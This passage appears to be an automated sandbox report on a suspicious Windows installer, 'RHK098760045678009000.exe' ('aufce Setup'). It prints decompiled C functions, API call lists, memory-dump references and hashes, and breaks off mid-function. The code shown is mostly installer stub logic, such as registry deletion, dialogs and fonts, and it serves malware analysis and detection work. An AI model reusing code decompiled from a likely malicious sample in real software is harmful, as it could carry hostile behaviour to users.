                0x00000000
                0x00402ab8
                0x00402acf
                0x00402ad7
                0x00402ade
                0x00402b04
                0x00402b0a
                0x00000000
                0x00000000
                0x00402b12
                0x00402b18
                0x00402b1a
                0x00000000
                0x00000000
                0x00000000
                0x00402b1a
                0x00000000
                0x00402aed
                0x00402b01

                APIs
                • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000000,?), ref: 00402A8A
                • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AC6
                • RegCloseKey.ADVAPI32(?), ref: 00402ACF
                • RegCloseKey.ADVAPI32(?), ref: 00402AF4
                • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B12
                Memory Dump Source
                • Source File: 00000000.00000002.263609418.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.263603207.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263627006.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263631692.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263647032.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263653995.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263661513.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263668333.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263691098.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Close$DeleteEnumOpen
                • String ID:
                • API String ID: 1912718029-0
                • Opcode ID: 5d0b6e0ce49e1b9a68b8278243b858d166325889e329a7d8d46ece79ca10f327
                • Instruction ID: fd754328231b90d3809392cacc3778cc58b9849b8c5c25df110c081a09ace752
                • Opcode Fuzzy Hash: 5d0b6e0ce49e1b9a68b8278243b858d166325889e329a7d8d46ece79ca10f327
                • Instruction Fuzzy Hash: 29116D71A0000AFEDF219F90DE49DAE3B79FB14345B104076FA05A00E0DBB89E51AFA9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401CDE, Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00401CDE(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 8), __edx);
				GetClientRect(_t25, _t27 - 0x50);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E00402A29(_t21), _t21,  *(_t27 - 0x48) *  *(_t27 - 0x20),  *(_t27 - 0x44) *  *(_t27 - 0x20), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







                0x00401ce8
                0x00401cef
                0x00401d1e
                0x00401d26
                0x00401d2d
                0x00401d2d
                0x004028c1
                0x004028cd

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.263609418.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.263603207.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263627006.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263631692.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263647032.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263653995.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263661513.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263668333.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263691098.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                • String ID:
                • API String ID: 1849352358-0
                • Opcode ID: b6dc52a7f50dc5a5b8d69a970bc0364d2e288b966cb10631b9234e7e7e1bdde9
                • Instruction ID: 6b5de524c76fb4cd20547a313357388a8ed9b6ad8842e2156e420fd608a0a23d
                • Opcode Fuzzy Hash: b6dc52a7f50dc5a5b8d69a970bc0364d2e288b966cb10631b9234e7e7e1bdde9
                • Instruction Fuzzy Hash: 75F0EC72A04118AFD701EBA4DE88DAFB77CFB44305B14443AF501F6190C7749D019B79
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00404649, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                Download Yara Rule
                C-Code - Quality: 77%
                			E00404649(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t22;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t41;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				signed int _t51;
				signed int _t53;

				_t21 = _a16;
				_t51 = _a12;
				_t41 = 0xffffffdc;
				if(_t21 == 0) {
					_push(0x14);
					_pop(0);
					_t22 = _t51;
					if(_t51 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t41 = 0xffffffdd;
					}
					if(_t51 < 0x400) {
						_t41 = 0xffffffde;
					}
					if(_t51 < 0xffff3333) {
						_t50 = 0x14;
						asm("cdq");
						_t22 = 1 / _t50 + _t51;
					}
					_t23 = _t22 & 0x00ffffff;
					_t53 = _t22 >> 0;
					_t43 = 0xa;
					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
				} else {
					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
					_t47 = 0;
				}
				_t29 = E00405BBA(_t41, _t47, _t53,  &_v36, 0xffffffdf);
				_t31 = E00405BBA(_t41, _t47, _t53,  &_v68, _t41);
				_t32 = E00405BBA(_t41, _t47, 0x420538, 0x420538, _a8);
				wsprintfA(_t32 + lstrlenA(0x420538), "%u.%u%s%s", _t53, _t47, _t31, _t29);
				return SetDlgItemTextA( *0x423718, _a4, 0x420538);
			}



















                0x0040464f
                0x00404654
                0x0040465c
                0x0040465d
                0x0040466a
                0x00404672
                0x00404673
                0x00404675
                0x00404677
                0x00404679
                0x0040467c
                0x0040467c
                0x00404683
                0x00404689
                0x00404689
                0x00404690
                0x00404697
                0x0040469a
                0x0040469d
                0x0040469d
                0x004046a1
                0x004046b1
                0x004046b3
                0x004046b6
                0x0040465f
                0x0040465f
                0x00404666
                0x00404666
                0x004046be
                0x004046c9
                0x004046df
                0x004046ef
                0x0040470b

                APIs
                • lstrlenA.KERNEL32(00420538,00420538,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404564,000000DF,00000000,00000400,?), ref: 004046E7
                • wsprintfA.USER32 ref: 004046EF
                • SetDlgItemTextA.USER32(?,00420538), ref: 00404702
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.263609418.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.263603207.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263627006.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263631692.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263647032.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263653995.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263661513.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263668333.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263691098.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ItemTextlstrlenwsprintf
                • String ID: %u.%u%s%s
                • API String ID: 3540041739-3551169577
                • Opcode ID: 9ec326ac30901ad515aaf80f2404a58f9bab4133aba90e091d0e9c932beca6f7
                • Instruction ID: 33c490f36d39f428f4b6feb88c055206d8f5fbd89635bf607d329e374d543c8d
                • Opcode Fuzzy Hash: 9ec326ac30901ad515aaf80f2404a58f9bab4133aba90e091d0e9c932beca6f7
                • Instruction Fuzzy Hash: 5A11D873A0512437EB0065699C41EAF329CDB82335F150637FE26F31D1E9B9DD1145E8
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401BCA, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                Download Yara Rule
                C-Code - Quality: 51%
                			E00401BCA() {
				signed int _t28;
				CHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 8) = E00402A0C(3);
				 *(_t55 + 8) = E00402A0C(4);
				if(( *(_t55 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00402A29(0x33);
				}
				__eflags =  *(_t55 - 0x14) & 0x00000002;
				if(( *(_t55 - 0x14) & 0x00000002) != 0) {
					 *(_t55 + 8) = E00402A29(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t50 = E00402A29();
					_t28 = E00402A29();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExA( *(_t55 - 8),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
					goto L10;
				} else {
					_t52 = E00402A0C();
					_t37 = E00402A0C();
					_t48 =  *(_t55 - 0x14) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8));
						L10:
						 *(_t55 - 0xc) = _t32;
					} else {
						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8), _t42, _t48, _t55 - 0xc);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x28)) >= _t42) {
					_push( *(_t55 - 0xc));
					E00405AF6();
				}
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}












                0x00401bd3
                0x00401bdf
                0x00401be2
                0x00401beb
                0x00401beb
                0x00401bee
                0x00401bf2
                0x00401bfb
                0x00401bfb
                0x00401bfe
                0x00401c02
                0x00401c04
                0x00401c51
                0x00401c53
                0x00401c5c
                0x00401c64
                0x00401c67
                0x00401c67
                0x00401c70
                0x00000000
                0x00401c06
                0x00401c0d
                0x00401c0f
                0x00401c17
                0x00401c1a
                0x00401c42
                0x00401c76
                0x00401c76
                0x00401c1c
                0x00401c2a
                0x00401c32
                0x00401c35
                0x00401c35
                0x00401c1a
                0x00401c79
                0x00401c7c
                0x00401c82
                0x00402866
                0x00402866
                0x004028c1
                0x004028cd

                APIs
                • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                • SendMessageA.USER32 ref: 00401C42
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.263609418.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.263603207.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263627006.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263631692.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263647032.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263653995.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263661513.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263668333.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263691098.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: MessageSend$Timeout
                • String ID: !
                • API String ID: 1777923405-2657877971
                • Opcode ID: 5e155985e8b695c365f3075347fc5cad64183b83899d6bbba3f89d2116927a25
                • Instruction ID: 8eb34b9659dedbc099cc11ce9bc18cab6bc834bdcc036981f8d30f042af137bc
                • Opcode Fuzzy Hash: 5e155985e8b695c365f3075347fc5cad64183b83899d6bbba3f89d2116927a25
                • Instruction Fuzzy Hash: C621A171A44149BEEF02AFF4C94AAEE7B75EF44704F10407EF501BA1D1DAB88A40DB29
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004038B4, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E004038B4(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				intOrPtr _t15;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E00405B0F(__ecx, "1033");
				while(1) {
					_t26 =  *0x423f84; // 0x1
					if(_t26 == 0) {
						goto L7;
					}
					_t15 =  *0x423f50; // 0x4e0f60
					_t16 =  *(_t15 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x423f80;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x423720 = _t18[1];
					 *0x423fe8 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x42371c = _t23;
						E00405AF6(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x420510, E00405BBA(_t13, _t24, _t26, "aufce Setup", 0xfffffffe));
						_t11 =  *0x423f6c; // 0x3
						_t27 =  *0x423f68; // 0x4e110c
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t5 = _t27 + 0x18; // 0x4e1124
								_t11 = E00405BBA(_t13, _t25, _t27, _t5, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}

















                0x004038b8
                0x004038bd
                0x004038c3
                0x004038c8
                0x004038c8
                0x004038d0
                0x00000000
                0x00000000
                0x004038d2
                0x004038d8
                0x004038e0
                0x004038e2
                0x004038e8
                0x004038e8
                0x004038ea
                0x004038f6
                0x00000000
                0x00000000
                0x004038fa
                0x00000000
                0x00000000
                0x00000000
                0x004038fc
                0x00403901
                0x0040390a
                0x00403910
                0x00403915
                0x00403929
                0x00403934
                0x0040394c
                0x00403952
                0x00403957
                0x0040395f
                0x00403980
                0x00403980
                0x00403980
                0x00403961
                0x00403963
                0x00403963
                0x00403967
                0x0040396a
                0x0040396e
                0x0040396e
                0x00403973
                0x00403979
                0x00403979
                0x00000000
                0x00403963
                0x00403917
                0x0040391c
                0x00403925
                0x0040391e
                0x0040391e
                0x0040391e
                0x0040391c

                APIs
                • SetWindowTextA.USER32(00000000,aufce Setup), ref: 0040394C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.263609418.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.263603207.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263627006.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263631692.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263647032.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263653995.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263661513.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263668333.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263691098.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: TextWindow
                • String ID: "C:\Users\user\Desktop\RHK098760045678009000.exe" $1033$aufce Setup
                • API String ID: 530164218-3575446529
                • Opcode ID: efc42492ee7b8a51a3ec7fa34d8682ca64c79934ee229eb602048578ff3af0eb
                • Instruction ID: 9405f6c8d043b7fcf606726b90d8bdb5e10644d2b1bbff0bcd5da451eaf68503
                • Opcode Fuzzy Hash: efc42492ee7b8a51a3ec7fa34d8682ca64c79934ee229eb602048578ff3af0eb
                • Instruction Fuzzy Hash: D211CFB1F006119BC7349F15E88093777BDEB89716369817FE801A73E0D67DAE029A98
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040568B, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E0040568B(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x409010);
				}
				return _t7;
			}




                0x0040568c
                0x004056a3
                0x004056ab
                0x004056ab
                0x004056b3

                APIs
                • lstrlenA.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,004030E8,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,?,00403289), ref: 00405691
                • CharPrevA.USER32(?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,004030E8,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,?,00403289), ref: 0040569A
                • lstrcatA.KERNEL32(?,00409010), ref: 004056AB
                Strings
                • C:\Users\user~1\AppData\Local\Temp\, xrefs: 0040568B
                Memory Dump Source
                • Source File: 00000000.00000002.263609418.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.263603207.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263627006.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263631692.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263647032.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263653995.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263661513.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263668333.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263691098.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CharPrevlstrcatlstrlen
                • String ID: C:\Users\user~1\AppData\Local\Temp\
                • API String ID: 2659869361-2382934351
                • Opcode ID: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
                • Instruction ID: e5ee9c2d52b027f92723a61f0ff242ac356e57f7af316d882355b101730f0027
                • Opcode Fuzzy Hash: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
                • Instruction Fuzzy Hash: 05D0A972606A302AE60227158C09F8B3A2CCF02321B040462F540B6292C2BC7D818BEE
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF8101F, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 54COMMON
                Download Yara Rule
                C-Code - Quality: 62%
                			E6FF8101F(intOrPtr _a8) {
				intOrPtr _t3;
				void* _t4;
				void* _t5;
				void* _t7;
				signed int _t8;
				intOrPtr* _t10;
				signed int _t12;
				intOrPtr* _t14;
				intOrPtr* _t19;
				void* _t22;

				_t3 = _a8;
				if(_t3 != 0) {
					L3:
					_t10 = __imp___adjust_fdiv; // 0x75e56be4
					 *0x6ff86974 =  *_t10;
					if(_t3 != 1) {
						if(_t3 != 0) {
							L15:
							_t4 = 1;
							return _t4;
						}
						_t5 =  *0x6ff8697c; // 0x0
						if(_t5 == 0) {
							goto L15;
						}
						_t12 =  *0x6ff86978; // 0x2206ce8
						_t2 = _t12 - 4; // 0x2206ce4
						_t19 = _t2;
						while(_t19 >= _t5) {
							_t14 =  *_t19;
							if(_t14 != 0) {
								 *_t14();
								_t5 =  *0x6ff8697c; // 0x0
							}
							_t19 = _t19 - 4;
						}
						free(_t5);
						 *0x6ff8697c =  *0x6ff8697c & 0x00000000;
						goto L15;
					}
					_t7 = malloc(0x80);
					 *0x6ff8697c = _t7;
					if(_t7 != 0) {
						 *_t7 =  *_t7 & 0x00000000;
						_t8 =  *0x6ff8697c; // 0x0
						_push(0x6ff85004);
						_push(0x6ff85000);
						 *0x6ff86978 = _t8;
						L6FF8341C();
						 *0x6ff86970 =  *0x6ff86970 + 1;
						goto L15;
					}
					L5:
					return 0;
				}
				_t22 =  *0x6ff86970 - _t3; // 0x0
				if(_t22 <= 0) {
					goto L5;
				}
				 *0x6ff86970 =  *0x6ff86970 - 1;
				goto L3;
			}













                0x6ff8101f
                0x6ff81025
                0x6ff81035
                0x6ff81035
                0x6ff81040
                0x6ff81046
                0x6ff81089
                0x6ff810c4
                0x6ff810c6
                0x00000000
                0x6ff810c6
                0x6ff8108b
                0x6ff81092
                0x00000000
                0x00000000
                0x6ff81094
                0x6ff8109b
                0x6ff8109b
                0x6ff8109e
                0x6ff810a2
                0x6ff810a6
                0x6ff810a8
                0x6ff810aa
                0x6ff810aa
                0x6ff810af
                0x6ff810af
                0x6ff810b5
                0x6ff810bb
                0x00000000
                0x6ff810c3
                0x6ff8104d
                0x6ff81056
                0x6ff8105b
                0x6ff81061
                0x6ff81064
                0x6ff81069
                0x6ff8106e
                0x6ff81073
                0x6ff81078
                0x6ff8107d
                0x00000000
                0x6ff81084
                0x6ff8105d
                0x00000000
                0x6ff8105d
                0x6ff81027
                0x6ff8102d
                0x00000000
                0x00000000
                0x6ff8102f
                0x00000000

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.265700956.000000006FF81000.00000020.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000000.00000002.265685733.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.265732809.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.265754390.000000006FF85000.00000040.00020000.sdmp Download File
                • Associated: 00000000.00000002.265772810.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: _inittermfreemalloc
                • String ID: kuP~u
                • API String ID: 1678931842-1219983255
                • Opcode ID: df36e0d104707d1ecfc1641f70e80e3cc07d5b22b2c4cc647e47770bba26362d
                • Instruction ID: c7bc85f0e9cc7fd678dcb6b5a636cc773bb653ac8a1cffe10946ec9d67a1aaae
                • Opcode Fuzzy Hash: df36e0d104707d1ecfc1641f70e80e3cc07d5b22b2c4cc647e47770bba26362d
                • Instruction Fuzzy Hash: E411E832636A81CFEB14CF74D954B6537B5BF077A5B10461AE531CB3E0EB22A850CB50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401D38, Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                Download Yara Rule
                C-Code - Quality: 67%
                			E00401D38() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 8)), 0x5a);
				0x40b014->lfHeight =  ~(MulDiv(E00402A0C(2), _t6, 0x48));
				 *0x40b024 = E00402A0C(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x18));
				 *0x40b02b = 1;
				 *0x40b028 = _t11 & 0x00000001;
				 *0x40b029 = _t11 & 0x00000002;
				 *0x40b02a = _t11 & 0x00000004;
				E00405BBA(_t18, _t24, _t26, 0x40b030,  *((intOrPtr*)(_t28 - 0x24)));
				_t14 = CreateFontIndirectA(0x40b014);
				_push(_t14);
				_push(_t26);
				E00405AF6();
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}











                0x00401d46
                0x00401d5f
                0x00401d69
                0x00401d6e
                0x00401d79
                0x00401d80
                0x00401d92
                0x00401d98
                0x00401d9d
                0x00401da7
                0x004024eb
                0x00401561
                0x00402866
                0x004028c1
                0x004028cd

                APIs
                • GetDC.USER32(?), ref: 00401D3F
                • GetDeviceCaps.GDI32(00000000), ref: 00401D46
                • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D55
                • CreateFontIndirectA.GDI32(0040B014), ref: 00401DA7
                Memory Dump Source
                • Source File: 00000000.00000002.263609418.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.263603207.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263627006.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263631692.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263647032.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263653995.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263661513.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263668333.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263691098.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CapsCreateDeviceFontIndirect
                • String ID:
                • API String ID: 3272661963-0
                • Opcode ID: 91a73ead397859bf4c0615e863a468d78fcadc575e8fb258f1077711b7347c7d
                • Instruction ID: 0c2e595a2d755a053b7cc3d6c09569b1e3f8f946256c05fe5e222a6b1ed621d0
                • Opcode Fuzzy Hash: 91a73ead397859bf4c0615e863a468d78fcadc575e8fb258f1077711b7347c7d
                • Instruction Fuzzy Hash: B0F0C870E48280AFE70157705F0ABAB3F64D715305F100876F251BA2E3C7B910088BAE
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00402BF1, Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00402BF1(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x4170e0; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x423f4c;
						if(_t2 >  *0x423f4c) {
							_t3 = CreateDialogParamA( *0x423f40, 0x6f, 0, E00402B6E, 0);
							 *0x4170e0 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00405F64(0);
					}
				} else {
					_t6 =  *0x4170e0; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x4170e0 = 0;
					return _t6;
				}
			}






                0x00402bf8
                0x00402c12
                0x00402c18
                0x00402c22
                0x00402c28
                0x00402c2e
                0x00402c3f
                0x00402c48
                0x00000000
                0x00402c4d
                0x00402c54
                0x00402c1a
                0x00402c21
                0x00402c21
                0x00402bfa
                0x00402bfa
                0x00402c01
                0x00402c04
                0x00402c04
                0x00402c0a
                0x00402c11
                0x00402c11

                APIs
                • DestroyWindow.USER32(00000000,00000000,00402DD1,00000001), ref: 00402C04
                • GetTickCount.KERNEL32 ref: 00402C22
                • CreateDialogParamA.USER32(0000006F,00000000,00402B6E,00000000), ref: 00402C3F
                • ShowWindow.USER32(00000000,00000005), ref: 00402C4D
                Memory Dump Source
                • Source File: 00000000.00000002.263609418.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.263603207.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263627006.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263631692.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263647032.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263653995.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263661513.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263668333.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263691098.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Window$CountCreateDestroyDialogParamShowTick
                • String ID:
                • API String ID: 2102729457-0
                • Opcode ID: 368aa0899d27fe077c31989b75da56c4405109c76bea3f602025cb1c6477c4a6
                • Instruction ID: 902fecb1894dce430947e24fe85b059bfb73d5b7bbd16117cdf5d745fa908bfb
                • Opcode Fuzzy Hash: 368aa0899d27fe077c31989b75da56c4405109c76bea3f602025cb1c6477c4a6
                • Instruction Fuzzy Hash: 37F03030A09321ABC611EF60BE4CA9E7B74F748B417118576F201B11A4CB7858818B9D
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF82090, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 186COMMON
                Download Yara Rule
                C-Code - Quality: 41%
                			E6FF82090(intOrPtr* _a4, char* _a8, int* _a12, intOrPtr _a16) {
				short* _v8;
				short* _v12;
				signed int _v16;
				int _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				short* _t83;
				intOrPtr _t95;
				intOrPtr _t97;
				intOrPtr _t99;
				intOrPtr _t101;
				intOrPtr _t103;
				void* _t135;
				void* _t136;

				_v8 = 0xc0000bbb;
				0x6ff80000("%p %p %p 0x%08x\n", _a4, _a8, _a12, _a16);
				_t136 = _t135 + 0x14;
				if(_a4 == 0 || _a12 == 0) {
					return 0xc0000bbd;
				}
				_v44 = 0;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v28 = 0;
				_v24 = 0;
				if( *_a4 == 0) {
					L6:
					if( *((intOrPtr*)(_a4 + 4)) == 0) {
						L9:
